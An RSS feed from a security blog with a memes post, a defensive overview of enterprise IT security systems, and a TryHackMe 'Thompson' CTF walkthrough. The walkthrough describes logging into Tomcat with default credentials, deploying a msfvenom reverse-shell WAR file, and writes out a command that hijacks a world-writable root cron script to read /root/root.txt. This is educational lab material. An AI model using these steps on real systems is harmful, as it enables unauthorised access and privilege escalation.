<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Eric Logan</title>
	<atom:link href="https://eric.cc/feed/" rel="self" type="application/rss+xml" />
	<link>https://eric.cc/</link>
	<description>A security and programming blog.</description>
	<lastBuildDate>Wed, 14 Jan 2026 02:53:54 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0</generator>

<image>
	<url>https://i0.wp.com/eric.cc/wp-content/uploads/2021/03/favicon.png?fit=16%2C16&#038;ssl=1</url>
	<title>Eric Logan</title>
	<link>https://eric.cc/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">211060323</site>	<item>
		<title>Top 5 Cybersecurity Memes Every IT Pro Will Relate To</title>
		<link>https://eric.cc/top-5-cybersecurity-memes/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=top-5-cybersecurity-memes</link>
					<comments>https://eric.cc/top-5-cybersecurity-memes/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Wed, 01 Apr 2026 15:30:00 +0000</pubDate>
				<category><![CDATA[Miscellaneous]]></category>
		<category><![CDATA[memes]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=1384</guid>

					<description><![CDATA[<p><a href="https://eric.cc/top-5-cybersecurity-memes/">Top 5 Cybersecurity Memes Every IT Pro Will Relate To</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>Everyone on April Fool&#8217;s Day deserves a hearty laugh, especially those working in IT and cybersecurity. Memes are just as fast-paced as some of the technology trends. Here are the top 5 cybersecurity memes that every IT pro will relate to. Cybersecurity Meme 1 &#8211; Friday deployments If you want to ruin the start (or [&#8230;]</p>
<p>The post <a href="https://eric.cc/top-5-cybersecurity-memes/">Top 5 Cybersecurity Memes Every IT Pro Will Relate To</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/top-5-cybersecurity-memes/">Top 5 Cybersecurity Memes Every IT Pro Will Relate To</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<p class="wp-block-paragraph">Everyone on April Fool&#8217;s Day deserves a hearty laugh, especially those working in IT and cybersecurity. Memes are just as fast-paced as some of the technology trends. Here are the top 5 cybersecurity memes that every IT pro will relate to.</p>



<h2 class="wp-block-heading">Cybersecurity Meme 1 &#8211; Friday deployments</h2>



<p class="wp-block-paragraph">If you want to ruin the start (or entire) weekend, introduce changes to your environment on a Friday. You might have even joked, &#8220;What is the worst that can happen?&#8221; Next thing you know, you&#8217;re opening severity 1 critical tickets, debugging, or reverting changes.</p>



<figure class="wp-block-image size-full is-resized"><img data-recalc-dims="1" fetchpriority="high" decoding="async" width="800" height="674" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/03/image-2.png?resize=800%2C674" alt="Meme #1 - Ruin your week by deploying on Friday meme." class="wp-image-1427" style="width:692px;height:auto" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-2.png?w=800&amp;ssl=1 800w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-2.png?resize=300%2C253&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-2.png?resize=768%2C647&amp;ssl=1 768w" sizes="(max-width: 800px) 100vw, 800px" /></figure>



<h2 class="wp-block-heading">Cybersecurity Meme 2 &#8211; Phishing attacks</h2>



<p class="wp-block-paragraph">Outsmarting cyber attackers 101. If you never open your inbox, you cannot fall for their phishing emails. A flawless (and impractical) security strategy.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" decoding="async" width="633" height="352" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/03/image-1.png?resize=633%2C352" alt="The Top 5 Cybersecurity Meme  #2 - Too smart to fall for phishing meme" class="wp-image-1426" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-1.png?w=633&amp;ssl=1 633w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-1.png?resize=300%2C167&amp;ssl=1 300w" sizes="(max-width: 633px) 100vw, 633px" /></figure>



<h2 class="wp-block-heading">Cybersecurity Meme 3 &#8211; Alerts, Alerts, Alerts</h2>



<p class="wp-block-paragraph">Joining the SOC team feels exciting at first — you’re ready to defend, detect, and dive into threats. But after 1,000 alerts, every analyst has a few war stories…</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" decoding="async" width="666" height="1024" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/03/image-666x1024.png?resize=666%2C1024" alt="The Top 5 Cybersecurity Meme  #3 - SOC alert fatigue meme" class="wp-image-1425" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image.png?resize=666%2C1024&amp;ssl=1 666w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image.png?resize=195%2C300&amp;ssl=1 195w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image.png?resize=768%2C1181&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image.png?resize=999%2C1536&amp;ssl=1 999w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image.png?w=1079&amp;ssl=1 1079w" sizes="(max-width: 666px) 100vw, 666px" /></figure>



<h2 class="wp-block-heading">Cybersecurity Meme 4 &#8211; Robot beats &#8220;I am not a Robot&#8221; Captcha</h2>



<p class="wp-block-paragraph">I think this pretty much speaks for itself.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="535" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/06/image-1024x535.png?resize=1024%2C535" alt="The Top 5 Cybersecurity Meme  #4 - not a robot captcha" class="wp-image-1446" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image.png?resize=1024%2C535&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image.png?resize=300%2C157&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image.png?resize=768%2C401&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image.png?w=1399&amp;ssl=1 1399w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading">Cybersecurity Meme 5 &#8211; Giving proprietary information to AI&#8230; What could go wrong?</h2>



<p class="wp-block-paragraph">It is easy to get lazy and to upload just about anything into Artificial Intelligence. ChatGPT, write me an apology email to upper management for using AI to write my emails.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="800" height="796" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/03/image-3.png?resize=800%2C796" alt="The Top 5 Cybersecurity Meme  #5 - AI meme" class="wp-image-1431" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-3.png?w=800&amp;ssl=1 800w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-3.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-3.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-3.png?resize=768%2C764&amp;ssl=1 768w" sizes="(max-width: 800px) 100vw, 800px" /></figure>



<p class="wp-block-paragraph">Happy April Fool&#8217;s Day 😁👍 &#8211; you can find more than the top 5 cybersecurity <a href="https://www.reddit.com/r/CybersecurityMemes/">memes here</a>. </p>



<p class="wp-block-paragraph">You can read more of my blog <a href="http://vps-1a659a37.vps.ovh.us/blog">here</a>.</p>



<p>The post <a href="https://eric.cc/top-5-cybersecurity-memes/">Top 5 Cybersecurity Memes Every IT Pro Will Relate To</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/top-5-cybersecurity-memes/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1384</post-id>	</item>
		<item>
		<title>10 Information Technology Systems Every Company Should Have</title>
		<link>https://eric.cc/it-systems-every-company-should-have/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=it-systems-every-company-should-have</link>
					<comments>https://eric.cc/it-systems-every-company-should-have/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Thu, 15 Jan 2026 15:00:00 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[Information Technology]]></category>
		<category><![CDATA[Infosec]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=1382</guid>

					<description><![CDATA[<p><a href="https://eric.cc/it-systems-every-company-should-have/">10 Information Technology Systems Every Company Should Have</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>Every company invests a percentage of its budget towards technology. Security solutions include tooling for endpoint security, network security, cloud security, data security, and identity access management. Not every solution will be covered in this post, and I will not go into vendor specifics. In no order of priority, every company should have these 10 [&#8230;]</p>
<p>The post <a href="https://eric.cc/it-systems-every-company-should-have/">10 Information Technology Systems Every Company Should Have</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/it-systems-every-company-should-have/">10 Information Technology Systems Every Company Should Have</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<p class="wp-block-paragraph">Every company invests a percentage of its budget towards technology. Security solutions include tooling for endpoint security, network security, cloud security, data security, and identity access management. Not every solution will be covered in this post, and I will not go into vendor specifics. In no order of priority, every company should have these 10 IT systems in place.</p>



<h2 class="wp-block-heading">EDR/AntiVirus</h2>



<p class="wp-block-paragraph">Endpoints are laptops, desktops, servers, and virtual machines. They are often the first to be compromised, and all of them need to be secured from bad actors. This is where AntiVirus and Endpoint Detection and Response (EDR) solutions come in. AntiVirus offers real-time malware protection, blocking known threats and alerting analysts to malicious activity. EDR solutions can identify suspicious behavior and enable analysts to respond to a security incident.</p>



<p class="wp-block-paragraph">How many times a month do you read about computers being compromised and spreading ransomware throughout a company? An antivirus solution could have prevented the malware from running in the first place. EDR software could have detected the suspicious behavior and isolated the device so it could no longer communicate with the rest of the network, preventing the malware from spreading.</p>



<p class="wp-block-paragraph">It cannot be emphasized enough how crucial it is to deploy software on endpoints that can monitor, protect, and prevent attacks.</p>



<p class="wp-block-paragraph">Although Microsoft has improved its Windows Defender product, it is the first hurdle any attacker creating malware is going to try to clear, since it is enabled by default on every Windows computer.</p>



<h2 class="wp-block-heading">SIEM &#8211; Logging</h2>



<p class="wp-block-paragraph">A Security Information and Event Management (SIEM) system collects system, application, cloud, and networking logs in a central location. Analysts can investigate alerts, visualize data, and monitor their IT environments.</p>



<p class="wp-block-paragraph">This gives the Security Operations Center (SOC) the visibility it needs to perform investigations. For example, suppose an employee downloads a malicious file from a website, and the malware elevates its privileges to admin and starts connecting to a botnet. A SIEM can log all of this information and correlate the events so an analyst can investigate which websites the employee visited, what the malware is doing on the machine, and where it is communicating to.</p>



<figure class="wp-block-image size-large is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="576" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/06/image-3-1024x576.png?resize=1024%2C576" alt="IT Systems - SIEM technology" class="wp-image-1458" style="width:754px;height:auto" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-3.png?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-3.png?resize=300%2C169&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-3.png?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-3.png?resize=800%2C450&amp;ssl=1 800w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-3.png?w=1280&amp;ssl=1 1280w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading">VPN &#8211; Virtual Private Network</h2>



<p class="wp-block-paragraph">No, I am not talking about the consumer VPN products you might have heard about from your favorite influencer.</p>



<p class="wp-block-paragraph">With the rise of remote working, employees need a Virtual Private Network to securely connect to the office network and work on their projects. An enterprise VPN is typically a split-tunnel VPN: traffic for internal resources is routed through the tunnel, while external access goes through the employee&#8217;s own Internet Service Provider. Consumer VPNs are full-tunnel, routing all traffic through the VPN for security and encryption.</p>



<p class="wp-block-paragraph">VPNs are the best way to access resources remotely without exposing assets to the public internet. VPN gateways, clients, and infrastructure must be heavily protected, as they could otherwise allow anyone access to the corporate network.</p>



<h2 class="wp-block-heading">Proxy &#8211; Internet Traffic Inspection</h2>



<p class="wp-block-paragraph">Another key point: once a device or user is connected, anything can happen on a network. It is important to monitor ingress and egress traffic and determine whether it is malicious or inappropriate usage. A proxy is the best way to block traffic that is not meant to leave your corporate environment, whether it is NSFW or malicious.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="393" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/06/image-2-1024x393.png?resize=1024%2C393" alt="IT Systems - Proxy Technology" class="wp-image-1457" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-2.png?resize=1024%2C393&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-2.png?resize=300%2C115&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-2.png?resize=768%2C295&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-2.png?resize=1536%2C589&amp;ssl=1 1536w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-2.png?resize=2048%2C786&amp;ssl=1 2048w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-2.png?w=2400&amp;ssl=1 2400w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading">Segmentation &amp; Firewall</h2>



<p class="wp-block-paragraph">Home networks are typically flat, meaning that once a device is connected, it can communicate with every other device on the network. In the spirit of least privilege, organizations should never have a flat network. Devices that do not need access to other network segments should not have it.</p>



<p class="wp-block-paragraph">The best way to segment networks is by using Virtual LANs (VLANs) and firewalls. VLANs determine which part of the network a device or application can communicate on. Firewalls allow or block communication between the different parts of the network.</p>



<p class="wp-block-paragraph">Generally speaking, networks should be separated into intranet, DMZ, and extranet; production should be separated from development; and BYOD/IoT devices should be on their own isolated network.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="668" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/06/image-1-1024x668.png?resize=1024%2C668" alt="IT Systems - Firewall technology" class="wp-image-1456" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-1.png?resize=1024%2C668&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-1.png?resize=300%2C196&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-1.png?resize=768%2C501&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-1.png?w=1033&amp;ssl=1 1033w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading">Backups</h2>



<p class="wp-block-paragraph">It&#8217;s always good to have backups of systems. Whether it is a system image or an application configuration. Backups should be taken regularly and are essential for dealing with a ransomware incident. Everybody needs a backup, and you will be glad you backed it up before things went wrong. </p>



<p class="wp-block-paragraph">To minimize the risk of data loss, follow the 3-2-1 backup rule. Keep 3 copies of your data, stored on 2 different types of media, with 1 copy kept off-site.</p>



<h2 class="wp-block-heading">Multifactor &#8211; Authentication</h2>



<p class="wp-block-paragraph">Every month, there is a new article about a leak of billions of passwords hitting the internet. Here&#8217;s an <a href="https://www.bleepingcomputer.com/news/security/no-the-16-billion-credentials-leak-is-not-a-new-data-breach/">article</a> about that happening recently.</p>



<p class="wp-block-paragraph">As cybersecurity professionals, we get it: passwords alone are no longer secure enough to protect accounts. Multifactor authentication provides security by checking that the user authenticating has their smartphone or biometrics. In today&#8217;s threat landscape, MFA should not rely on sending a text message to a phone number, due to attacks like SIM swapping. MFA should be done with a mobile authenticator app or a device like a YubiKey.</p>



<h2 class="wp-block-heading">Email Security</h2>



<p class="wp-block-paragraph">Email has been the lifeblood of professional communication on the Internet for the last 25 years. Everyone online has an email address.</p>



<p class="wp-block-paragraph">Not every sender has their recipients&#8217; best interests in mind. Any IT security exam will cover the various phishing techniques that can be carried out through email. So it is imperative to have good technologies in place to block suspicious-looking emails, including those that contain suspicious attachments.</p>



<p class="wp-block-paragraph">Technology is not the only solution to this problem. The best way to defend against email-based attacks is training. Employees should know the signs of a phishing attack and learn the process for reporting it to the IT department.</p>



<h2 class="wp-block-heading">Patch Management</h2>



<p class="wp-block-paragraph">What good is securing servers and workstations if they are not kept up to date with security patches? New exploits come out all the time. For example, the JavaScript framework React had a critical vulnerability named React2Shell, which allowed attackers to remotely execute code on any affected machine with an HTTP request. Updating software is the best way to avoid being vulnerable.</p>



<p class="wp-block-paragraph">Microsoft releases patches for Windows machines on the second Tuesday of every month. Linux has no fixed timeline for releasing patches; they are released whenever they become available.</p>



<h2 class="wp-block-heading">Vulnerability Scanning</h2>



<p class="wp-block-paragraph">Lastly, vulnerability scanners can draw analysts&#8217; attention to which technologies should be addressed and in what priority they should be fixed, and catch concerns early before they become an issue. It is too common for organizations to keep old devices around because they run an application that stopped receiving updates years ago. Vulnerability scanners can call out these old devices and justify that they have reached the end of their lifecycle.</p>



<p class="wp-block-paragraph">As mentioned before, patch management is a good way to knock out the easy wins. However, some applications or software require a more in-depth look to remediate the vulnerabilities.</p>
<p>The post <a href="https://eric.cc/it-systems-every-company-should-have/">10 Information Technology Systems Every Company Should Have</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/it-systems-every-company-should-have/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1382</post-id>	</item>
		<item>
		<title>TryHackMe: Thompson</title>
		<link>https://eric.cc/tryhackme-thompson/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tryhackme-thompson</link>
					<comments>https://eric.cc/tryhackme-thompson/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Tue, 04 Jul 2023 14:00:00 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[TryHackMe]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=487</guid>

					<description><![CDATA[<p><a href="https://eric.cc/tryhackme-thompson/">TryHackMe: Thompson</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>TryHackMe Thompson is a boot2root machine from the FIT and BSides Guatemala CTFs, challenging players to generate payloads and abuse file permissions.</p>
<p>The post <a href="https://eric.cc/tryhackme-thompson/">TryHackMe: Thompson</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/tryhackme-thompson/">TryHackMe: Thompson</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<h2 class="wp-block-heading">Introduction</h2>



<p class="wp-block-paragraph">TryHackMe: <a href="https://tryhackme.com/room/bsidesgtthompson">Thompson</a> was first released for the FIT and BSides Guatemala CTF. To get right into it, Thompson&#8217;s server is running a default installation of Tomcat with default administrator credentials. We gain initial access to the web server by uploading a malicious war file, then misuse file permissions to read protected files.</p>



<h2 class="wp-block-heading">Information Gathering</h2>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="309" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/05/1.-Task-1-1-1024x309.png?resize=1024%2C309" alt="Thompson Task 1" class="wp-image-1043" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/1.-Task-1-1.png?resize=1024%2C309&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/1.-Task-1-1.png?resize=300%2C90&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/1.-Task-1-1.png?resize=768%2C231&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/1.-Task-1-1.png?w=1208&amp;ssl=1 1208w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Task 1</figcaption></figure>



<p class="wp-block-paragraph">In CTF fashion, there is no prior information about this engagement. The goal of this room is to find, access, and read the user.txt and root.txt flags.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="769" height="347" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/06/2.-nmap-j.png?resize=769%2C347" alt="Thompson nmap scan" class="wp-image-1163" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/2.-nmap-j.png?w=769&amp;ssl=1 769w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/2.-nmap-j.png?resize=300%2C135&amp;ssl=1 300w" sizes="(max-width: 769px) 100vw, 769px" /><figcaption class="wp-element-caption">Nmap scan</figcaption></figure>



<p class="wp-block-paragraph">The Nmap scan indicates that three ports are open. The services running are SSH, Apache JServ, and Apache Tomcat.</p>



<p class="wp-block-paragraph">Opening the browser, we navigate to the website hosting Tomcat on <strong>port 8080</strong>. This is a default installation of Apache Tomcat version 8.5.5. Tomcat is an open-source Java web application server.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1019" height="726" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/06/3.-website-8080-h.png?resize=1019%2C726" alt="Tomcat version 8.5.5" class="wp-image-1165" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/3.-website-8080-h.png?w=1019&amp;ssl=1 1019w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/3.-website-8080-h.png?resize=300%2C214&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/3.-website-8080-h.png?resize=768%2C547&amp;ssl=1 768w" sizes="(max-width: 1019px) 100vw, 1019px" /><figcaption class="wp-element-caption">Tomcat dashboard</figcaption></figure>



<p class="wp-block-paragraph">Have a look around the Apache Tomcat dashboard. Server Status displays general server information, system resources, and service status. Manager App provides basic functionality to deploy web apps. The Host Manager&#8217;s purpose is to deploy, configure, and manage virtual hosts. You can access these services by using Tomcat&#8217;s default credentials, <strong>tomcat</strong>:<strong>s3cret</strong>.</p>



<h2 class="wp-block-heading">Exploitation</h2>



<p class="wp-block-paragraph">Welcome to the Tomcat Web Application Manager for all your web app needs.</p>



<figure class="wp-block-image size-large is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/06/7.-uploaded-shell-1024x603.png?resize=840%2C494" alt="" class="wp-image-1153" width="840" height="494" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/7.-uploaded-shell.png?resize=1024%2C603&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/7.-uploaded-shell.png?resize=300%2C177&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/7.-uploaded-shell.png?resize=768%2C452&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/7.-uploaded-shell.png?resize=1536%2C904&amp;ssl=1 1536w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/7.-uploaded-shell.png?w=1881&amp;ssl=1 1881w" sizes="(max-width: 840px) 100vw, 840px" /><figcaption class="wp-element-caption">Tomcat web app manager</figcaption></figure>



<p class="wp-block-paragraph">The file type we use to deploy a web app is a war file. WAR stands for Web Application Resource, and it is <a href="https://www.baeldung.com/java-jar-war-packaging"><strong>used to package web applications</strong> that we can deploy on any Servlet/JSP container.</a></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="726" height="75" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/05/5.-war-file.png?resize=726%2C75" alt="Thompson msfvenom payload" class="wp-image-1047" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/5.-war-file.png?w=726&amp;ssl=1 726w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/5.-war-file.png?resize=300%2C31&amp;ssl=1 300w" sizes="(max-width: 726px) 100vw, 726px" /><figcaption class="wp-element-caption">msfvenom payload</figcaption></figure>



<p class="wp-block-paragraph">Using the payload above, we craft a malicious war file named shell3.war. This is a reverse TCP shell, meaning we can upload the file and have it connect back to our attacking machine. msfvenom is a payload generator that can package Metasploit payloads into many different file formats.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="813" height="519" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/05/8.-msf-handler.png?resize=813%2C519" alt="Thompson metasploit" class="wp-image-1049" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/8.-msf-handler.png?w=813&amp;ssl=1 813w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/8.-msf-handler.png?resize=300%2C192&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/8.-msf-handler.png?resize=768%2C490&amp;ssl=1 768w" sizes="(max-width: 813px) 100vw, 813px" /><figcaption class="wp-element-caption">Metasploit handler</figcaption></figure>



<p class="wp-block-paragraph">Run Metasploit&#8217;s multi-handler module and launch the malicious payload by opening it on your web browser. The shell will connect to our machine, and we now have access to the victim server.</p>



<h2 class="wp-block-heading">Post Exploitation</h2>



<p class="wp-block-paragraph">Let&#8217;s get our bearing now that we are on the machine. We can see that we are the <strong>tomcat</strong> user of the system and in the root directory. The user.txt file lives in Jack&#8217;s home directory, and we have permission to read the file.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="490" height="97" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/06/Screenshot_2-h.png?resize=490%2C97" alt="Thompson user.txt flag" class="wp-image-1167" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Screenshot_2-h.png?w=490&amp;ssl=1 490w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Screenshot_2-h.png?resize=300%2C59&amp;ssl=1 300w" sizes="(max-width: 490px) 100vw, 490px" /><figcaption class="wp-element-caption">user.txt flag</figcaption></figure>



<p class="wp-block-paragraph">Looking at the rest of the contents of Jack&#8217;s home directory, we see a file named <code>id.sh</code>. The purpose of this file is to execute the <code>id</code> command and write its output to the test.txt file.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="540" height="354" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/06/Screenshot_3-h.png?resize=540%2C354" alt="" class="wp-image-1169" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Screenshot_3-h.png?w=540&amp;ssl=1 540w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Screenshot_3-h.png?resize=300%2C197&amp;ssl=1 300w" sizes="(max-width: 540px) 100vw, 540px" /></figure>



<p class="wp-block-paragraph">Let&#8217;s take a closer look at the highlighted portion above. The file&#8217;s permissions allow anyone to read, write, and execute it, which means we can replace its contents with whatever we like. Rewriting the script only helps if a process with more privilege than ours executes it on our behalf, so before counting on it, look for a root cron entry for the script in <code>/etc/crontab</code> (or the cron.d directories) that tells you how and when it runs.</p>



<p class="wp-block-paragraph">With the following bash command we can replace the contents of <code>id.sh</code> without touching its permissions or ownership: the <code>&gt;</code> redirection truncates and rewrites the existing file in place rather than deleting and recreating it, so the inode keeps its mode and owner.</p>



<p class="wp-block-paragraph"><code>echo "cat /root/root.txt &gt; test.txt" &gt; id.sh</code></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="565" height="130" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/06/Screenshot_4-h-1.png?resize=565%2C130" alt="Thompson root.txt" class="wp-image-1172" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Screenshot_4-h-1.png?w=565&amp;ssl=1 565w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Screenshot_4-h-1.png?resize=300%2C69&amp;ssl=1 300w" sizes="(max-width: 565px) 100vw, 565px" /></figure>



<p class="wp-block-paragraph">Once the script has run again under its privileged owner, we can cat out the test.txt file and find the contents of root.txt inside it!</p>
